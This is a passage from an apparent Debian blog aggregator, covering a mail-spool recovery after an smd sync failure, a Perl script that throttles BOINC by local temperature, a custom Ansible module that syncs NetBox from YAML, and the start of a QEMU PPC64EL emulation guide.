Then I crossed my fingers and ran smd-push -v -s, as that was suggested by smd error codes themselves. That thankfully started restoring mail. It failed a few times on weird cases of files being duplicates, but I resolved this by following the instructions. Or mostly: I actually deleted the files instead of moving them, which made smd even unhappier (if there ever was such a thing). I had to recreate some of those files, so, lesson learned: do follow the advice smd gives you, even if it seems useless or strange. But then smd-push was humming along, uploading tens of thousands of messages, saturating the upload in the office, refilling the mail spool on the server... yaay!... ? Except... well, of course that didn't quite work: the mail spool in the office eventually started to grow beyond the size of the mail spool on the workstation. That is what smd-push eventually settled on:
default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
default: smd-client@smd-server-anarcat: TAGS: error::context(receive) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
default: smd-client@smd-server-anarcat: TAGS: stats::new-mails(151697), del-mails(0), bytes-received(7539147811), xdelta-received(10881198)
It recreated 151 697 emails, adding about 2000 emails to the pool, kind of from nowhere at all. On marcos, before:
ncdu 1.13 ~ Use the arrow keys to navigate, press ? for help
--- /home/anarcat/Maildir ------------------------------------
    4,0 GiB [##########] /.notmuch
  717,3 MiB [#         ] /.Archives.2014
  498,2 MiB [#         ] /.feeds.debian-planet
  453,1 MiB [#         ] /.Archives.2012
  414,5 MiB [#         ] /.debian
  408,2 MiB [#         ] /.quoifaire
  389,8 MiB [          ] /.rapports
  356,6 MiB [          ] /.tor
  182,6 MiB [          ] /.koumbit
  179,8 MiB [          ] /tmp
   56,8 MiB [          ] /.nn
   43,0 MiB [          ] /.act-mtl
   32,6 MiB [          ] /.feeds.sysadvent
   31,7 MiB [          ] /.feeds.releases
   31,4 MiB [          ] /.Sent.2005
   26,3 MiB [          ] /.sage
   25,5 MiB [          ] /.freedombox
   24,0 MiB [          ] /.feeds.git-annex
   21,1 MiB [          ] /.Archives.2011
   19,1 MiB [          ] /.Sent.2003
   16,7 MiB [          ] /.bugtraq
   16,2 MiB [          ] /.mlug
 Total disk usage:   8,0 GiB  Apparent size:   7,6 GiB  Items: 184426
After:
ncdu 1.13 ~ Use the arrow keys to navigate, press ? for help
--- /home/anarcat/Maildir ------------------------------------
    4,7 GiB [##########] /.notmuch
    2,7 GiB [#####     ] /.junk
    1,9 GiB [###       ] /cur
  717,3 MiB [#         ] /.Archives.2014
  659,3 MiB [#         ] /.Sent
  513,9 MiB [#         ] /.Archives.2012
  498,2 MiB [#         ] /.feeds.debian-planet
  449,6 MiB [          ] /.Archives.2015
  414,5 MiB [          ] /.debian
  408,2 MiB [          ] /.quoifaire
  389,8 MiB [          ] /.rapports
  380,8 MiB [          ] /.Archives.2013
  356,6 MiB [          ] /.tor
  261,1 MiB [          ] /.Archives.2011
  240,9 MiB [          ] /.koumbit
  183,6 MiB [          ] /.Archives.2010
  179,8 MiB [          ] /tmp
  128,4 MiB [          ] /.lists
  106,1 MiB [          ] /.inso-interne
  103,0 MiB [          ] /.github
   75,0 MiB [          ] /.nanog
   69,8 MiB [          ] /.full-disclosure
 Total disk usage:  16,2 GiB  Apparent size:  15,5 GiB  Items: 341143
That is 156 717 files more. On curie:
ncdu 1.13 ~ Use the arrow keys to navigate, press ? for help
--- /home/anarcat/Maildir ------------------------------------------------------------------
    2,7 GiB [##########] /.junk
    2,3 GiB [########  ] /.notmuch
    1,9 GiB [######    ] /cur
  661,2 MiB [##        ] /.Archives.2014
  655,3 MiB [##        ] /.Sent
  512,0 MiB [#         ] /.Archives.2012
  447,3 MiB [#         ] /.Archives.2015
  438,5 MiB [#         ] /.feeds.debian-planet
  406,5 MiB [#         ] /.quoifaire
  383,6 MiB [#         ] /.debian
  378,6 MiB [#         ] /.Archives.2013
  303,3 MiB [#         ] /.tor
  296,0 MiB [#         ] /.rapports
  237,6 MiB [          ] /.koumbit
  233,2 MiB [          ] /.Archives.2011
  182,1 MiB [          ] /.Archives.2010
  127,0 MiB [          ] /.lists
  104,8 MiB [          ] /.inso-interne
  102,7 MiB [          ] /.register
   89,6 MiB [          ] /.github
   67,1 MiB [          ] /.full-disclosure
   66,5 MiB [          ] /.nanog
 Total disk usage:  13,3 GiB  Apparent size:  12,6 GiB  Items: 342465
Interestingly, there are more files, but less disk usage. It's possible the notmuch database there is more efficient. So maybe there's nothing to worry about. Last night's marcos backup has:
root@marcos:/home/anarcat# find /mnt/home/anarcat/Maildir | pv -l | wc -l
 341k 0:00:16 [20,4k/s] [                             <=>                                                                                                                                     ]
341040
... 341040 files, which seems about right, considering some mail was delivered during the day. An audit can be performed with hashdeep:
borg mount /media/sdb2/borg/::marcos-auto-2021-03-22 /mnt
hashdeep -c sha256 -r /mnt/home/anarcat/Maildir | pv -l -s 341k > Maildir-backup-manifest.txt
And then compared with:
hashdeep -c sha256 -k Maildir-backup-manifest.txt Maildir/
Some extra files should show up in the Maildir, and very few should actually be missing, because I would not normally delete the previous day's mail the very next day. The actual summary hashdeep gave me was:
hashdeep: Audit failed
   Input files examined: 0
  Known files expecting: 0
          Files matched: 339080
Files partially matched: 0
            Files moved: 782
        New files found: 107
  Known files not found: 106
So 107 files added, 106 deleted. Seems good enough for me... Postfix was stopped at Mar 22 21:12:59 to try and stop external events from confusing things even further. I reviewed the delivery log to see if mail that came in during the problem window disappeared:
grep 'dovecot:.*stored mail into mailbox' /var/log/mail.log |
  tail -20 |
  sed 's/.*msgid=<//;s/>.*//' |
  while read msgid; do 
    notmuch count --exclude=false id:$msgid |
      grep 0 && echo $msgid missing;
  done
And things looked okay. Now of course if we go further back, we find mail I actually deleted (because I do do that sometimes), so it's hard to use this log as an audit trail. We can only hope that the curie spool is sufficiently coherent to be relied on. Worst case, we'll have to restore from last night's backup, but that's getting far away now: I get hundreds of mails a day in that mail spool, and resetting back to last night does not seem like a good idea. A dry run of smd-pull on angela seems to agree that it's missing some files:
default: smd-client@localhost: TAGS: stats::new-mails(154914), del-mails(0), bytes-received(0), xdelta-received(0)
... a number of mails somewhere in between the other two, go figure. A "wet" run of this was started, without deletion (-n), which gave us:
default: smd-client@localhost: TAGS: stats::new-mails(154911), del-mails(0), bytes-received(7658160107), xdelta-received(10837609)
Strange that it sync'd three fewer emails, but that's still better than nothing, and we have a mail spool on angela again:
anarcat@angela:~(main)$ notmuch new
purging with prefix '.': spam moved (0), ham moved (0), deleted (0), done
Note: Ignoring non-mail file: /home/anarcat/Maildir//.uidvalidity
Processed 1779 total files in 26s (66 files/sec.).
Added 1190 new messages to the database. Removed 3 messages. Detected 593 file renames.
tagging with prefix '.': spam, sent, feeds, koumbit, tor, lists, rapports, folders, done.
Notice how only 1190 messages were re-added; that is because I killed notmuch before it had time to remove all those mails from its database.

Possible causes I am totally at a loss as to why smd started destroying everything like it did. But a few things come to mind:
  1. I rewired my office on that day.
  2. This meant unplugging curie, the workstation.
  3. It has a bad CMOS battery (known problem), so it jumped around the time continuum a few times, sometimes by years.
  4. The smd services are run from a systemd unit with OnCalendar=*:0/2. I have heard that major time jumps can "pile up" the execution of jobs, and it seems that is what happened in this case.
  5. It's possible that locking in smd is not as great as it could be, and that it corrupted its internal data structures on curie, which led it to command the destruction of the remote mail spool.
It's also possible that there was a disk failure on the server, marcos. But since it's running on a (software) RAID-1 array, and no errors have been found (according to dmesg), I don't think that's a plausible hypothesis.

Lessons learned
  1. follow what smd says, even if it seems useless or strange.
  2. trust but verify: just backup everything before you do anything, especially the largest data set.
  3. daily backups are not great for email, unless you're ready to lose a day of email (which I'm not).
  4. hashdeep is great. I keep finding new use cases for it. Last time it was to audit my camera SD card to make sure I didn't forget anything, and now this. It's fast and powerful.
  5. borg is great too. The FUSE mount was especially useful, and it was pretty fast to explore the backup, even through that overhead: checksumming 15GB of mail took about 35 minutes, which gives a respectable 8MB/s, probably bottlenecked by the crap external USB drive I use for backups (!).
  6. I really need to finish my backup system so that I have automated offsite backups, although in this case that would actually have been much slower (certainly not 8MB/s!).

Workarounds and solutions I set up fake-hwclock on curie, so that the next power failure will not upset my clock that badly. I am thinking of switching to ZFS or BTRFS for most of my filesystems, so that I can use filesystem snapshots (including remotely!) as a backup strategy. This seems so much more powerful than crawling the filesystem for changes, and allows for truly offsite backups protected from an attacker (hopefully). But it's a long way there. I'm also thinking of rebuilding my mail setup without smd. It's not the first time something like this has happened with smd. It is the first time I am fairly confident it's the root cause of the problem, however, and it makes me really nervous for the future. I have used offlineimap in the past and it seems it was finally ported to Python 3, so that could be an option again. isync/mbsync is another option, which I tried before but do not remember why I didn't switch. A complete redesign with something like getmail and/or nncp could also be an option. But alas, I lack the time to go crazy with those experiments. Somehow, doing like everyone else and just going with Google still doesn't seem to be an option for me. Screw big tech. But I am afraid they will win, eventually. In any case, I'm just happy I got mail again, strangely.

5 January 2021

Russell Coker: Weather and Boinc

I just wrote a Perl script to look at the Australian Bureau of Meteorology pages to find the current temperature in an area and then adjust BOINC settings accordingly. The Perl script (in this post after the break, which shouldn't be in the RSS feed) takes the URL of a Bureau of Meteorology observation point as ARGV[0] and parses that to find the current (within the last hour) temperature. Then successive command line arguments are of the form 24:100 and 30:50, which indicate that below 24C 100% of CPU cores should be used and below 30C 50% of CPU cores should be used. In warm weather having a couple of workstations in a room running BOINC (or any other CPU intensive task) will increase the temperature and also make excessive noise from cooling fans. To change the number of CPU cores used, the script changes /etc/boinc-client/global_prefs_override.xml and then tells BOINC to reload that config file. This code is a little ugly (it doesn't properly parse XML, it just replaces a line of text) and could fail on a valid configuration file that wasn't produced by the current BOINC code. The parsing of the BoM page is a little ugly too, as it relies on the HTML code in the BoM page: they could make a page that looks identical but breaks the parsing, or even a page that contains the same data but looks different. It would be nice if the BoM published some APIs for getting the weather. One thing that would be good is TXT records in the DNS. DNS supports caching with a specified lifetime and is designed for high throughput in aggregate. If you had a million IOT devices polling the current temperature and forecasts every minute via DNS, the people running the servers wouldn't even notice the load, while a million devices polling a web based API would be a significant load. As an aside, I recommend playing nice and only running such a script every 30 minutes; the BoM page seems to be updated on the half hour, so I have my cron jobs running at 5 and 35 minutes past the hour. If this code works for you then that's great. If it merely acts as an inspiration for developing your own code then that's great too! BOINC users outside Australia could replace the code for getting meteorological data (or even interface to a digital thermometer). Australians who use other CPU intensive batch jobs could take the BoM parsing code and replace the BOINC related code. If you write scripts inspired by this please blog about it and comment here with a link to your blog post.
#!/usr/bin/perl
use strict;
use Sys::Syslog;

# St Kilda Harbour RMYS
# http://www.bom.gov.au/products/IDV60901/IDV60901.95864.shtml
my $URL = $ARGV[0];

# Fetch the BoM observation page and skip ahead to the data table.
open(IN, "wget -o /dev/null -O - $URL|") or die "Can't get $URL";
while(<IN>)
{
  if($_ =~ /tr class=.rowleftcolumn/)
  {
    last;
  }
}

# Extract the value of a given column (t1-datetime, t1-tmp, ...) from a table row.
sub get_data
{
  if(not $_[0] =~ /headers=.t1-$_[1]/)
  {
    return undef;
  }
  $_[0] =~ s/^.*headers=.t1-$_[1]..//;
  $_[0] =~ s/<.td.*$//;
  return $_[0];
}

my @datetime;
my $cur_temp = -100;
while(<IN>)
{
  chomp;
  if($_ =~ /^<.tr>$/)
  {
    last;
  }
  my $res;
  if($res = get_data($_, "datetime"))
  {
    @datetime = split(/\//, $res);
  }
  elsif($res = get_data($_, "tmp"))
  {
    $cur_temp = $res;
  }
}
close(IN);
if($#datetime != 1 or $cur_temp == -100)
{
  die "Can't parse BOM data";
}

# Refuse to act on stale data: the observation must be from today or
# yesterday and no more than an hour old.
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
if($mday - $datetime[0] > 1 or ($datetime[0] > $mday and $mday != 1))
{
  die "Date wrong\n";
}
my $mins;
my @timearr = split(/:/, $datetime[1]);
$mins = $timearr[0] * 60 + $timearr[1];
if($timearr[1] =~ /pm/)
{
  $mins += 720;
}
if($mday != $datetime[0])
{
  $mins += 1440;
}
if($mins + 60 < $hour * 60 + $min)
{
  die "page outdated\n";
}

# Parse the temperature:percentage thresholds from the command line and pick
# the percentage matching the current temperature.
my %temp_hash;
foreach ( @ARGV[1..$#ARGV] )
{
  my @tmparr = split(/:/, $_);
  $temp_hash{$tmparr[0]} = $tmparr[1];
}
my @temp_list = sort(keys(%temp_hash));
my $percent = 0;
my $i;
for($i = $#temp_list; $i >= 0 and $temp_list[$i] > $cur_temp; $i--)
{
  $percent = $temp_hash{$temp_list[$i]};
}

# Rewrite the BOINC preferences override file if the percentage changed,
# then tell BOINC to reload it.
my $prefs = "/etc/boinc-client/global_prefs_override.xml";
open(IN, "<$prefs") or die "Can't read $prefs";
my @prefs_contents;
while(<IN>)
{
  push(@prefs_contents, $_);
}
close(IN);
openlog("boincmgr-cron", "", "daemon");
my @cpus_pct = grep(/max_ncpus_pct/, @prefs_contents);
my $cpus_line = $cpus_pct[0];
$cpus_line =~ s/..max_ncpus_pct.$//;
$cpus_line =~ s/^.*max_ncpus_pct.//;
if($cpus_line == $percent)
{
  syslog("info", "Temp $cur_temp" . "C, already set to $percent");
  exit 0;
}
open(OUT, ">$prefs.new") or die "Can't write $prefs.new";
for($i = 0; $i <= $#prefs_contents; $i++)
{
  if($prefs_contents[$i] =~ /max_ncpus_pct/)
  {
    print OUT "   <max_ncpus_pct>$percent.000000</max_ncpus_pct>\n";
  }
  else
  {
    print OUT $prefs_contents[$i];
  }
}
close(OUT);
rename "$prefs.new", "$prefs" or die "can't rename";
system("boinccmd --read_global_prefs_override");
syslog("info", "Temp $cur_temp" . "C, set percentage to $percent");

19 September 2020

Vincent Bernat: Syncing NetBox with a custom Ansible module

The netbox.netbox collection from Ansible Galaxy provides several modules to update NetBox objects:
- name: create a device in NetBox
  netbox_device:
    netbox_url: http://netbox.local
    netbox_token: s3cret
    data:
      name: to3-p14.sfo1.example.com
      device_type: QFX5110-48S
      device_role: Compute Switch
      site: SFO1
However, if NetBox is not your source of truth, you may want to ensure it stays in sync with your configuration management database by removing outdated devices or IP addresses. While it should be possible to glue together a playbook with a query, a loop and some filtering to delete unwanted elements, it feels clunky, inefficient and an abuse of YAML as a programming language. A specific Ansible module solves this issue and is likely more flexible.

Notice I recommend that you read Writing a custom Ansible module as an introduction, as well as Syncing MySQL tables for a first simpler example.

Code The module has the following signature and it syncs NetBox with the content of the provided YAML file:
netbox_sync:
  source: netbox.yaml
  api: https://netbox.example.com
  token: s3cret
The synchronized objects are:
  • sites,
  • manufacturers,
  • device types,
  • device roles,
  • devices, and
  • IP addresses.
In our environment, the YAML file is generated from our configuration management database and contains a set of devices and a list of IP addresses:
devices:
  ad2-p6.sfo1.example.com:
     datacenter: sfo1
     manufacturer: Cisco
     model: Catalyst 2960G-48TC-L
     role: net_tor_oob_switch
  to1-p6.sfo1.example.com:
     datacenter: sfo1
     manufacturer: Juniper
     model: QFX5110-48S
     role: net_tor_gpu_switch
# […]
ips:
  - device: ad2-p6.example.com
    ip: 172.31.115.18/21
    interface: oob
  - device: to1-p6.example.com
    ip: 172.31.115.33/21
    interface: oob
  - device: to1-p6.example.com
    ip: 172.31.254.33/32
    interface: lo0.0
# […]
The network team is not the sole tenant in NetBox. While adding new objects or modifying existing ones should be relatively safe, deleting unwanted objects can be risky. The module only deletes objects it did create or modify. To identify them, it marks them with a specific tag, cmdb. Most objects in NetBox accept tags.
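For instance, restricting queries to objects carrying that tag is straightforward with pynetbox; a hypothetical snippet, not taken from the module itself:
import pynetbox

nb = pynetbox.api("https://netbox.example.com", token="s3cret")

# Only objects previously tagged "cmdb" by the module are considered "ours"
# and are therefore candidates for update or deletion.
for device in nb.dcim.devices.filter(tag="cmdb"):
    print(device.name)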

Module definition Starting from the skeleton described in the previous article, we define the module:
module_args = dict(
    source=dict(type='path', required=True),
    api=dict(type='str', required=True),
    token=dict(type='str', required=True, no_log=True),
    max_workers=dict(type='int', required=False, default=10)
)
result = dict(
    changed=False
)
module = AnsibleModule(
    argument_spec=module_args,
    supports_check_mode=True
)
It contains an additional optional argument defining the number of workers used to talk to NetBox and query the existing objects in parallel, to speed up execution.
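The article does not show how max_workers is wired in, but the usual pattern would be to fan the existing-object lookups out over a thread pool; a generic sketch (the fetch_existing() helper and its arguments are mine, not the module's):
from concurrent.futures import ThreadPoolExecutor

def fetch_existing(endpoint, keys, key_attr, max_workers=10):
    """Look up existing NetBox objects in parallel.

    endpoint is a pynetbox endpoint such as netbox.dcim.devices; keys are
    the object keys we care about (names, models, addresses, ...).
    """
    def fetch(key):
        # Endpoint.get() accepts attribute filters as keyword arguments.
        return key, endpoint.get(**{key_attr: key})

    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        return dict(pool.map(fetch, keys))
With max_workers=10, the default above, ten lookups are in flight at any time.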

Abstracting synchronization We need to synchronize different object types, but once we have a list of objects we want in NetBox, the grunt work is always the same:
  • check if the objects already exist,
  • retrieve them and put them in a form suitable for comparison,
  • retrieve the extra objects we don't want anymore,
  • compare the two sets, and
  • add missing objects, update existing ones, delete extra ones.
We code these behaviours into a Synchronizer abstract class. For each kind of object, a concrete class is built with the appropriate class attributes to tune its behaviour and a wanted() method to provide the objects we want. I am not explaining the abstract class code here. Have a look at the source if you want.
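To give an idea of the shape such a class can take, here is a minimal sketch. This is not the actual implementation from the source; the current(), create(), update() and delete() helpers are placeholders, and error handling is left out:
class Synchronizer:
    """Sketch of a base class for the synchronizers below."""

    app = None              # NetBox application, e.g. "dcim"
    table = None            # NetBox table, e.g. "devices"
    key = None              # attribute used to look up existing objects
    foreign = {}            # attributes resolved through another synchronizer
    only_on_create = ()     # attributes set at creation but never updated
    remove_unused = 0       # refuse to delete more than this many objects

    def __init__(self, module, netbox, source, before, after):
        self.module = module    # AnsibleModule (check mode, failures)
        self.netbox = netbox    # pynetbox API object
        self.source = source    # parsed YAML file
        self.before = before    # shared dict of current states, per table
        self.after = after      # shared dict of wanted states, per table

    def wanted(self):
        """Map object keys to wanted attributes (provided by subclasses)."""
        raise NotImplementedError

    def current(self):
        """Map object keys to current attributes for the objects tagged
        "cmdb" in NetBox, in the same shape as wanted()."""
        raise NotImplementedError   # would query NetBox through self.netbox

    # The actual NetBox calls (through pynetbox create/update/delete) are
    # left to the real implementation; these are only placeholders.
    def create(self, key, attrs): raise NotImplementedError
    def update(self, key, attrs): raise NotImplementedError
    def delete(self, key): raise NotImplementedError

    def prepare(self):
        """Compute both states and report whether they differ."""
        self.before[self.table] = self.current()
        self.after[self.table] = self.wanted()
        return self.before[self.table] != self.after[self.table]

    def synchronize(self):
        """Add missing objects, update existing ones, delete extra ones."""
        current = self.before[self.table]
        wanted = self.after[self.table]
        extra = set(current) - set(wanted)
        if len(extra) > self.remove_unused:
            raise RuntimeError(f"refusing to delete {len(extra)} {self.table}")
        for key in extra:
            self.delete(key)
        for key, attrs in wanted.items():
            if key not in current:
                self.create(key, attrs)      # tags the new object with "cmdb"
            elif current[key] != attrs:
                updates = {a: v for a, v in attrs.items()
                           if a not in self.only_on_create}
                self.update(key, updates)
The concrete classes below then only need to set the class attributes and implement wanted().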

Synchronizing tags and tenants As a starter, here is how we define the class synchronizing the tags:
class SyncTags(Synchronizer):
    app = "extras"
    table = "tags"
    key = "name"
    def wanted(self):
        return  "cmdb": dict(
            slug="cmdb",
            color="8bc34a",
            description="synced by network CMDB") 
The app and table attributes define the NetBox objects we want to manipulate. The key attribute is used to determine how to look up existing objects. In this example, we want to look up tags using their names. The wanted() method is expected to return a dictionary mapping object keys to the list of wanted attributes. Here, the keys are tag names and we create only one tag, cmdb, with the provided slug, color and description. This is the tag we will use to mark the objects we create or modify. If the tag does not exist, it is created. If it exists, the provided attributes are updated. Other attributes are left untouched. We also want to create a specific tenant for objects accepting such an attribute (devices and IP addresses):
class SyncTenants(Synchronizer):
    app = "tenancy"
    table = "tenants"
    key = "name"
    def wanted(self):
        return  "Network": dict(slug="network",
                                description="Network team") 

Synchronizing sites We also need to synchronize the list of sites. This time, the wanted() method uses the information provided in the YAML file: it walks the devices and builds a set of datacenter names.
class SyncSites(Synchronizer):
    app = "dcim"
    table = "sites"
    key = "name"
    only_on_create = ("status", "slug")
    def wanted(self):
        result = set(details["datacenter"]
                     for details in self.source['devices'].values()
                     if "datacenter" in details)
        return {k: dict(slug=k,
                        status="planned")
                for k in result}
Thanks to the use of the only_on_create attribute, the specified attributes are not updated if they are different. The goal of this synchronizer is mostly to collect the references to the different sites for other objects.
>>> pprint(SyncSites(**sync_args).wanted())
{'sfo1': {'slug': 'sfo1', 'status': 'planned'},
 'chi1': {'slug': 'chi1', 'status': 'planned'},
 'nyc1': {'slug': 'nyc1', 'status': 'planned'}}

Synchronizing manufacturers, device types and device roles The synchronization of manufacturers is pretty similar, except we do not use the only_on_create attribute:
class SyncManufacturers(Synchronizer):
    app = "dcim"
    table = "manufacturers"
    key = "name"
    def wanted(self):
        result = set(details["manufacturer"]
                     for details in self.source['devices'].values()
                     if "manufacturer" in details)
        return  k:  "slug": slugify(k) 
                for k in result 
Regarding the device types, we use the foreign attribute linking a NetBox attribute to the synchronizer handling it.
class SyncDeviceTypes(Synchronizer):
    app = "dcim"
    table = "device_types"
    key = "model"
    foreign =  "manufacturer": SyncManufacturers 
    def wanted(self):
        result = set((details["manufacturer"], details["model"])
                     for details in self.source['devices'].values()
                     if "model" in details)
        return {k[1]: dict(manufacturer=k[0],
                           slug=slugify(k[1]))
                for k in result}
The wanted() method refers to the manufacturer using its key attribute. In this case, this is the manufacturer name.
>>> pprint(SyncManufacturers(**sync_args).wanted())
{'Cisco': {'slug': 'cisco'},
 'Dell': {'slug': 'dell'},
 'Juniper': {'slug': 'juniper'}}
>>> pprint(SyncDeviceTypes(**sync_args).wanted())
{'ASR 9001': {'manufacturer': 'Cisco', 'slug': 'asr-9001'},
 'Catalyst 2960G-48TC-L': {'manufacturer': 'Cisco',
                           'slug': 'catalyst-2960g-48tc-l'},
 'MX10003': {'manufacturer': 'Juniper', 'slug': 'mx10003'},
 'QFX10002-36Q': {'manufacturer': 'Juniper', 'slug': 'qfx10002-36q'},
 'QFX10002-72Q': {'manufacturer': 'Juniper', 'slug': 'qfx10002-72q'},
 'QFX5110-32Q': {'manufacturer': 'Juniper', 'slug': 'qfx5110-32q'},
 'QFX5110-48S': {'manufacturer': 'Juniper', 'slug': 'qfx5110-48s'},
 'QFX5200-32C': {'manufacturer': 'Juniper', 'slug': 'qfx5200-32c'},
 'S4048-ON': {'manufacturer': 'Dell', 'slug': 's4048-on'},
 'S6010-ON': {'manufacturer': 'Dell', 'slug': 's6010-on'}}
The device roles are defined like this:
class SyncDeviceRoles(Synchronizer):
    app = "dcim"
    table = "device_roles"
    key = "name"
    def wanted(self):
        result = set(details["role"]
                     for details in self.source['devices'].values()
                     if "role" in details)
        return {k: dict(slug=slugify(k),
                        color="8bc34a")
                for k in result}

Synchronizing devices A device is mostly a name with references to a role, a model, a datacenter and a tenant. These references are declared as foreign keys using the synchronizers defined previously.
class SyncDevices(Synchronizer):
    app = "dcim"
    table = "devices"
    key = "name"
    foreign =  "device_role": SyncDeviceRoles,
               "device_type": SyncDeviceTypes,
               "site": SyncSites,
               "tenant": SyncTenants 
    remove_unused = 10
    def wanted(self):
        return {name: dict(device_role=details["role"],
                           device_type=details["model"],
                           site=details["datacenter"],
                           tenant="Network")
                for name, details in self.source['devices'].items()
                if {"datacenter", "model", "role"} <= set(details.keys())}
The remove_unused attribute is a safety check: the module fails if it would have to delete more than 10 devices, since that may be an indication there is a bug somewhere, unless one of your datacenters suddenly caught fire.
>>> pprint(SyncDevices(**sync_args).wanted())
{'ad2-p6.sfo1.example.com': {'device_role': 'net_tor_oob_switch',
                             'device_type': 'Catalyst 2960G-48TC-L',
                             'site': 'sfo1',
                             'tenant': 'Network'},
 'to1-p6.sfo1.example.com': {'device_role': 'net_tor_gpu_switch',
                             'device_type': 'QFX5110-48S',
                             'site': 'sfo1',
                             'tenant': 'Network'},
[…]

Synchronizing IP addresses The last step is to synchronize IP addresses. We do not attach them to a device. Instead, we specify the device names in the description of the IP address:
class SyncIPs(Synchronizer):
    app = "ipam"
    table = "ip-addresses"
    key = "address"
    foreign = {"tenant": SyncTenants}
    remove_unused = 1000
    def wanted(self):
        wanted = {}
        for details in self.source['ips']:
            if details['ip'] in wanted:
                wanted[details['ip']]['description'] = \
                    f"{details['device']} (and others)"
            else:
                wanted[details['ip']] = dict(
                    tenant="Network",
                    status="active",
                    dns_name="",        # information is present in DNS
                    description=f" details['device'] :  details['interface'] ",
                    role=None,
                    vrf=None)
        return wanted
There is a slight difficulty: NetBox allows duplicate IP addresses, so a simple lookup is not enough. In case of multiple matches, we choose the best by preferring those tagged with cmdb, then those already attached to an interface:
def get(self, key):
    """Grab IP address from NetBox."""
    # There may be duplicates. We need to grab the "best".
    results = super(Synchronizer, self).get(key)
    if len(results) == 0:
        return None
    if len(results) == 1:
        return results[0]
    scores = [0]*len(results)
    for idx, result in enumerate(results):
        if "cmdb" in result.tags:
            scores[idx] += 10
        if result.interface is not None:
            scores[idx] += 5
    return sorted(zip(scores, results),
                  reverse=True, key=lambda k: k[0])[0][1]

Getting the current and wanted states Each synchronizer is initialized with a reference to the Ansible module, a reference to the pynetbox API object, the data contained in the provided YAML file and two empty dictionaries for the current and expected states:
source = yaml.safe_load(open(module.params['source']))
netbox = pynetbox.api(module.params['api'],
                      token=module.params['token'])
sync_args = dict(
    module=module,
    netbox=netbox,
    source=source,
    before={},
    after={}
)
synchronizers = [synchronizer(**sync_args) for synchronizer in [
    SyncTags,
    SyncTenants,
    SyncSites,
    SyncManufacturers,
    SyncDeviceTypes,
    SyncDeviceRoles,
    SyncDevices,
    SyncIPs
]]
Each synchronizer has a prepare() method whose goal is to compute the current and wanted states. It returns True in case of a difference:
# Check what needs to be synchronized
try:
    for synchronizer in synchronizers:
        result['changed'] |= synchronizer.prepare()
except AnsibleError as e:
    result['msg'] = e.message
    module.fail_json(**result)
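prepare() itself belongs to the base class and is not shown here. Conceptually, it boils down to something like the sketch below, where current() is an assumed helper serializing the existing NetBox objects into dictionaries comparable with wanted(), and before/after are the dictionaries passed at construction:
def prepare(self):
    """Compute current and wanted states; return True if they differ."""
    wanted = self.wanted()
    current = self.current()            # assumed helper: existing objects, serialized
    # Record both states so the module can later build the per-table diff.
    self.before[self.table] = current
    self.after[self.table] = wanted
    return current != wanted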

Applying changes Back to the skeleton described in the previous article, the last step is to apply the changes if there is a difference between these states. Each synchronizer registers the current and wanted states in sync_args["before"][table] and sync_args["after"][table] where table is the name of the table for a given NetBox object type. The diff object is a bit elaborate as it is built table by table. This enables Ansible to display the name of each table before the diff representation:
# Compute the diff
if module._diff and result['changed']:
    result['diff'] = [
        dict(
            before_header=table,
            after_header=table,
            before=yaml.safe_dump(sync_args["before"][table]),
            after=yaml.safe_dump(sync_args["after"][table]))
        for table in sync_args["after"]
        if sync_args["before"][table] != sync_args["after"][table]
    ]
# Stop here if check mode is enabled or if no change
if module.check_mode or not result['changed']:
    module.exit_json(**result)
Each synchronizer also exposes a synchronize() method to apply changes and a cleanup() method to delete unwanted objects. Order is important due to the relation between the objects.
# Synchronize
for synchronizer in synchronizers:
    synchronizer.synchronize()
for synchronizer in synchronizers[::-1]:
    synchronizer.cleanup()
module.exit_json(**result)
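The synchronize() method is also implemented in the base class available on GitHub. The sketch below is only a rough approximation: it assumes a resolve() helper mapping a foreign synchronizer and a key to the matching NetBox object, and an endpoint() helper returning the pynetbox endpoint for self.app and self.table.
def synchronize(self):
    """Create or update NetBox objects to match the wanted state."""
    for key, attributes in self.wanted().items():
        attributes = dict(attributes, **{self.key: key})
        # Fields declared in `foreign` reference objects managed by another
        # synchronizer; NetBox expects their numeric ID, not their name.
        for field, synchronizer in getattr(self, "foreign", {}).items():
            attributes[field] = self.resolve(synchronizer, attributes[field]).id
        existing = self.get(key)
        if existing is None:
            self.endpoint().create(**attributes)   # assumed helper wrapping pynetbox
        else:
            existing.update(attributes)            # pynetbox sends a PATCH with the changes
Since a foreign object must exist before it can be referenced, creations are applied in declaration order and deletions in reverse order, which is exactly what the two loops above do.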

The complete code is available on GitHub. Compared to using the netbox.netbox collection, the logic is written in Python instead of trying to glue Ansible tasks together. I believe this is both more flexible and easier to read, notably when trying to delete outdated objects. While I did not test it, it should also be faster. An alternative would have been to reuse code from the netbox.netbox collection, as it contains similar primitives. Unfortunately, I didn't think of it until now.

  1. In my opinion, a good option for a source of truth is to use YAML files in a Git repository. You get versioning for free and people can get started with a text editor.
  2. This limitation is mostly due to laziness: we do not really care about this information. Our main motivation for putting IP addresses in NetBox is to keep track of the used IP addresses. However, if an IP address is already attached to an interface, we leave this association untouched.

14 July 2020

Russell Coker: Debian PPC64EL Emulation

In my post on Debian S390X Emulation [1] I mentioned having problems booting a Debian PPC64EL kernel under QEMU. Giovanni commented that they had PPC64EL working and gave a link to their site with Debian QEMU images for various architectures [2]. I tried their image, which worked, then tried mine again, which also worked; it seems that a recent update in Debian/Unstable fixed the bug that made QEMU not work with the PPC64EL kernel. Here are the instructions on how to do it. First you need to create a filesystem in an image file with commands like the following:
truncate -s 4g /vmstore/ppc
mkfs.ext4 /vmstore/ppc
mount -o loop /vmstore/ppc /mnt/tmp
Then visit the Debian Netinst page [3] to download the PPC64EL net install ISO, and loopback mount it somewhere convenient like /mnt/tmp2. The package qemu-system-ppc has the program for emulating a PPC64LE system; the qemu-user-static package has the program for emulating PPC64LE for a single program (i.e. a statically linked program or a chroot environment), which you need to run debootstrap. The following commands should be most of what you need.
apt install qemu-system-ppc qemu-user-static
update-binfmts --display
# qemu ppc64 needs exec stack to solve "Could not allocate dynamic translator buffer"
# so enable that on SE Linux systems
setsebool -P allow_execstack 1
debootstrap --foreign --arch=ppc64el --no-check-gpg buster /mnt/tmp file:///mnt/tmp2
chroot /mnt/tmp /debootstrap/debootstrap --second-stage
cat << END > /mnt/tmp/etc/apt/sources.list
